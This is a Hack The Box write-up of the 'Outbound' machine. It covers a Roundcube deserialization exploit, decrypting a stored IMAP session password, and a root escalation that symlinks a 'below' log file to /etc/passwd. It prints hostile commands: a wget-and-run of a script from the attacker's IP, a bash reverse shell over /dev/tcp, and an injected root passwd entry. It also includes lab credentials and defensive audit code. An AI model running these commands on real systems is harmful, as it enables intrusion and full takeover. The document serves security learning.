OutBound (HTB)

Intro

Hello everyone, a new HTB seasonal machine, Outbound. Let's get right into it.

Enumeration

Port scanning

# Nmap 7.97 scan initiated Mon Jul 14 01:55:25 2025 as: nmap -vvv -p 22,80 -4 -sC -sV -vv -o scan.nmap 10.10.11.77
Nmap scan report for mail.outbound.htb (10.10.11.77)
Host is up, received syn-ack (0.014s latency).
Scanned at 2025-07-14 01:55:25 +08 for 8s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN9Ju3bTZsFozwXY1B2KIlEY4BA+RcNM57w4C5EjOw1QegUUyCJoO4TVOKfzy/9kd3WrPEj/FYKT2agja9/PM44=
|   256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH9qI0OvMyp03dAGXR0UPdxw7hjSwMR773Yb9Sne+7vD
80/tcp open  http    syn-ack nginx 1.24.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-favicon: Unknown favicon MD5: 924A68D347C80D0E502157E83812BB23
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Roundcube Webmail :: Welcome to Roundcube Webmail
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 14 01:55:33 2025 -- 1 IP address (1 host up) scanned in 7.74 seconds

Normal stuff, SSH and HTTP. Let's see what we have on the website.

HTTP

So we have a Roundcube webmail.

Let's not forget that we are already provided with credentials (as if I had not wasted 30 minutes looking for a way in, LOL).

tyler / LhKL1o9Nm3X2

We can log in using those. After logging in there is nothing interesting, so I started searching for CVEs, but first we need to know the version if possible. I found it: if you view the source of the main page after login you will see a lot of JavaScript code; look for "rcversion":10610, which is version 1.6.10. Looking for known CVEs we can find this one...

The exploit is basically due to unsafe PHP (de)serialization: we can inject PHP code and therefore execute system commands, which allows us to get a shell on the machine. You can use the Metasploit module for it, but I used this one.

Using this command I was able to get a shell on the system:

php exploit.php http://mail.outbound.htb "tyler" "LhKL1o9Nm3X2" 'wget http://10.10.16.111:8000/exploit.sh -O /tmp/ex.sh && chmod +x /tmp/ex.sh && bash /tmp/ex.sh'

Basically we just upload our bash script to the machine, which then opens a reverse shell back to our machine.

And this is the content of exploit.sh:

sh -i >& /dev/tcp/10.10.16.111/9001 0>&1

Also do not forget to start a listener on port 9001.

once again.

And here once again I forgot that we have tyler's password: the same password we used to log in to Roundcube also logs us in as tyler on the machine.

One more thing: this machine does not have Python, so you cannot stabilize the shell using

python3 -c 'import pty; pty.spawn("/bin/bash")'

But we can use the script command:

script /dev/null -qc bash

This will stabilize our shell.

Shell as jacob

So after I got a shell as tyler I started looking around, especially at the emails he has, since we have ports 25, 998, 995 open and all of these are used for email.

But nothing was there. So I looked at the database (I had already looked at it before I got tyler, because I forgot that we have the password). There is a users table, which does not include anything interesting. But there is also a session table. The session table holds the IMAP sessions, and through my search I came across the fact that IMAP sessions may hold the cleartext password and a lot of info regarding the currently logged-in user. So we can see this session in the table.


After decoding it (it is Base64) we can find out that this is jacob's session, and we indeed have a password in there.

L7Rv00A8TuwJAr67kITxxcSgnIk25Am/
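To see what such a session record actually holds, here is an added example (my own code, not Roundcube's) that decodes a base64 session blob of the same shape and parses the PHP serialize() format Roundcube's session handler writes (name|value; pairs). The sample record is constructed, and its password value is a placeholder for the encrypted value, not the one from the box.

```python
import base64

# Constructed sample: a Roundcube-style PHP session record (name|value; pairs,
# values in PHP serialize() format). The password is a placeholder for the
# encrypted value stored by Roundcube, not a real one.
SAMPLE_SESSION = base64.b64encode(
    b'language|s:5:"en_US";user_id|i:1;username|s:5:"jacob";'
    b'storage_host|s:9:"localhost";storage_port|i:143;storage_ssl|b:0;'
    b'password|s:32:"EXAMPLE_ENCRYPTED_PASSWORD_BLOB!";'
    b'unseen_count|a:2:{s:5:"INBOX";i:2;s:5:"Trash";i:0;}'
).decode()

def _unserialize(data, pos):
    """Parse one PHP serialize() value starting at pos; return (value, next_pos)."""
    tag = data[pos]
    if tag == "N":                       # N;
        return None, pos + 2
    if tag in "ibd":                     # i:123;  b:1;  d:1.5;
        end = data.index(";", pos)
        raw = data[pos + 2:end]
        val = {"i": int, "b": lambda v: v == "1", "d": float}[tag](raw)
        return val, end + 1
    if tag == "s":                       # s:LEN:"...";  LEN is a byte count
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                # skip  :"
        return data[start:start + length], start + length + 2  # skip  ";
    if tag == "a":                       # a:N:{key;value;...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        p = colon + 2                    # skip  :{
        out = {}
        for _ in range(count):
            key, p = _unserialize(data, p)
            out[key], p = _unserialize(data, p)
        return out, p + 1                # skip  }
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")

def parse_session(b64):
    """Decode a base64 session blob into {name: value}; latin-1 keeps byte lengths exact."""
    data = base64.b64decode(b64).decode("latin-1")
    result, pos = {}, 0
    while pos < len(data):
        bar = data.index("|", pos)
        name = data[pos:bar]
        result[name], pos = _unserialize(data, bar + 1)
    return result
```

Running it on the sample gives a dict with username, storage host and the password field side by side, which is why the session table (together with the des_key in the config) should be treated as credential material.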

But what is this password? My initial thought was that this is a DES password, because I found this in the config:

// This key is used to encrypt the users imap password which is stored
// in the session record. For the default cipher method it must be
// exactly 24 characters long.
// YOUR KEY MUST BE DIFFERENT THAN THE SAMPLE VALUE FOR SECURITY REASONS
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

So I tried to use DES and Triple DES to crack it, but no luck. After some searching I came across this:

https://github.com/roundcube/roundcubemail/blob/master/bin/decrypt.sh

This is a script that exists within Roundcube to decrypt the passwords, so I tried it and it worked.

Then we have shell as jacob.

But here is where it got funnier. I checked the webmail, logged in with jacob's creds and found 2 emails, one about below and the second about a password reset, and there I just stopped: I had no clue what to do next, nor what to do with the password I found in the email. With some hints I checked the open ports, then I realized that this Docker container is not the main machine, as it does not have SSH open 😂. Then I figured that I could use jacob's creds to log in via SSH. That also did not work, then I tried the password from the mail, THEN it finally worked and I got the first flag.

Shell as root

From the emails we found for jacob we already know what we need to do. In the SSH session, using sudo -l, we can see that we can run below as root with no password. Also, by default below runs as root. So looking at the GitHub repo under Security we can see one critical vulnerability, an interesting one actually.

Here is the link first.

So basically what happens is that under /var/log/below any user can create any file, because the directory is created with world-writable permissions, and via that we can create a symbolic link from the error log file to /etc/passwd, enabling us to write to the passwd file and therefore add a root user and gain root access. Such an interesting flow.

So let's exploit it.

First we need to navigate to /var/log/below and create a symbolic link like so:

ln -sf /etc/passwd /var/log/below/error_root.log

After we do so, any error is going to go into this file, so we need to generate an error that contains an entry for our new root user.

sudo below replay --time '
pythonic:$6$Fd.GMy5CXkINzQqk$uE8tJZpKEb2Xr2Mby7QBg0OOvG5p/7nKZeUHlxId04X6/XaYXYCeWCOaG6and4C5SDYCmo1pFMdQprQCJuMb51:0:0:root:/root:/bin/bash
'

This is the command I used. Also, if you would like to generate a Linux password hash like that, you can use openssl:

openssl passwd -6 <PASSWORD>

After we execute the command we just need to log in to our new user with su pythonic and we should be root.
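As an added check (my own code, not from the writeup or from the below project), this audit flags the two conditions the flow above depends on: a world-writable log directory or file, and a symlink inside the log directory, especially one that resolves outside it. The demo layout is constructed in a temporary directory, with a stand-in file in place of /etc/passwd.

```python
import os
import stat
import tempfile

def audit_log_dir(path="/var/log/below"):
    """Return findings for a log directory a root daemon writes into:
    world-writable directory/files and any symlink (flagging those that
    resolve outside the directory). An empty list means nothing suspicious."""
    path = os.path.realpath(path)
    findings = []
    if os.stat(path).st_mode & stat.S_IWOTH:
        findings.append(f"WORLD-WRITABLE DIR: {path}")
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        st = os.lstat(full)                    # lstat: look at the link itself
        if stat.S_ISLNK(st.st_mode):
            target = os.path.realpath(full)    # follow it as the daemon would on write
            if target.startswith(path + os.sep):
                findings.append(f"SYMLINK (inside dir): {full} -> {target}")
            else:
                findings.append(f"SYMLINK ESCAPES DIR: {full} -> {target}")
        elif stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
            findings.append(f"WORLD-WRITABLE FILE: {full}")
    return findings

def build_demo_dir():
    """Constructed layout for a stand-alone run: a sticky, world-writable log
    directory (like the vulnerable /var/log/below) holding error_root.log as a
    symlink to a file outside it, a stand-in for /etc/passwd."""
    base = tempfile.mkdtemp()
    logdir = os.path.join(base, "below")
    os.mkdir(logdir)
    os.chmod(logdir, 0o1777)
    outside = os.path.join(base, "passwd")     # stand-in, not the real /etc/passwd
    open(outside, "w").close()
    os.symlink(outside, os.path.join(logdir, "error_root.log"))
    return logdir

if __name__ == "__main__":
    for line in audit_log_dir(build_demo_dir()):
        print(line)
```

Run against the real directory (the default argument) on a host where below is installed, a clean result is an empty list; the fix is a root-owned, non-world-writable log directory with no symlinks in it.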

And just like that we are roooooot now. EASY.

Conclusion

This machine was quite fun and tricky. I was not used to having creds before the hack, especially on Linux, but we learn. I also learned more about IMAP, POP and SMTP and more enumeration commands, which is good. Also the below exploit was fun to exploit. Thank you for reading :) 💓.
